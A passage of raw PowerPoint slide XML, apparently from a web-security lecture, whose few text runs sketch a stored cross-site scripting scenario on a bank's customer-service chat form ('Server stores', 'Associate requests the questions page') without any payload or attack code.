          <p:cNvPr id="11" name="object 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2298960" y="3503061"/>
            <a:ext cx="5149427" cy="1507067"/>
            <a:chOff x="1724220" y="2627296"/>
            <a:chExt cx="3862070" cy="1130300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778587" y="2538306"/>
            <a:ext cx="1582420" cy="1494426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Associate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>questions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>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7" name="object 1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18" name="object 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104986" y="30303"/>
            <a:ext cx="6361007" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5533675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-87" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 1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20" name="object 2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21" name="object 21"/>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22" name="object 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10253472" y="1487408"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="7690103" y="1115555"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8430762" y="1115555"/>
              <a:ext cx="458723" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>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5" name="object 25"/>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8638022" y="1246644"/>
              <a:ext cx="251456" cy="158483"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7690103" y="1344167"/>
              <a:ext cx="1207007" cy="109727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>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29" name="object 29"/>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0" name="object 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10396371" y="1552587"/>
            <a:ext cx="1458807" cy="220133"/>
            <a:chOff x="7797278" y="1164440"/>
            <a:chExt cx="1094105" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="object 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8432292" y="1178039"/>
              <a:ext cx="458718" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 32"/>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3" name="object 33"/>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4" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7797278" y="1164440"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>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36" name="object 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10239237" y="1798319"/>
            <a:ext cx="497840" cy="591820"/>
            <a:chOff x="7679428" y="1348739"/>
            <a:chExt cx="373380" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7679428" y="1348739"/>
              <a:ext cx="373374" cy="443478"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="38" name="object 38"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7725854" y="1372057"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 39"/>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40" name="object 40"/>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1" name="object 41"/>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42" name="object 42"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2834199"/>
            <a:ext cx="2479040" cy="1144692"/>
            <a:chOff x="0" y="2125649"/>
            <a:chExt cx="1859280" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="object 44"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2131834"/>
              <a:ext cx="683015" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="45" name="object 45"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="660175" y="2136076"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 46"/>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47" name="object 47"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="621791" y="2253995"/>
              <a:ext cx="1237487" cy="729983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="object 48"/>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49" name="object 49"/>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50" name="object 50"/>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51" name="object 51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="849376" y="3076432"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="637031" y="2307323"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="object 52"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1377695" y="2307323"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="object 53"/>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54" name="object 54"/>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55" name="object 55"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1584950" y="2438385"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="object 56"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId16" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="637031" y="2534391"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="object 57"/>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58" name="object 58"/>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59" name="object 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992725" y="3141071"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="744543" y="2355803"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="60" name="object 60"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId17" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1379219" y="2369807"/>
              <a:ext cx="460235" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="object 61"/>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62" name="object 62"/>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63" name="object 63"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId18" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="744543" y="2355803"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273725" y="3603749"/>
            <a:ext cx="1148080"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65" name="object 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="837183" y="3387337"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="627887" y="2540502"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="66" name="object 66"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId19" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="627887" y="2540502"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="67" name="object 67"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId20" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="673114" y="2563418"/>
              <a:ext cx="277416" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="object 68"/>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69" name="object 69"/>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70" name="object 70"/>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71" name="object 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367764" y="3050012"/>
            <a:ext cx="291253" cy="209973"/>
            <a:chOff x="275823" y="2287509"/>
            <a:chExt cx="218440" cy="157480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="72" name="object 72"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId21" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275823" y="2287509"/>
              <a:ext cx="111252" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="73" name="object 73"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId22" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="317155" y="2295348"/>
              <a:ext cx="176944" cy="85037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="object 74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612717" y="815171"/>
            <a:ext cx="6147647" cy="672706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16087" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="127"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-460" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>chat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>customer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>associate.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="object 79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740682" y="5752200"/>
            <a:ext cx="3364653" cy="1079783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
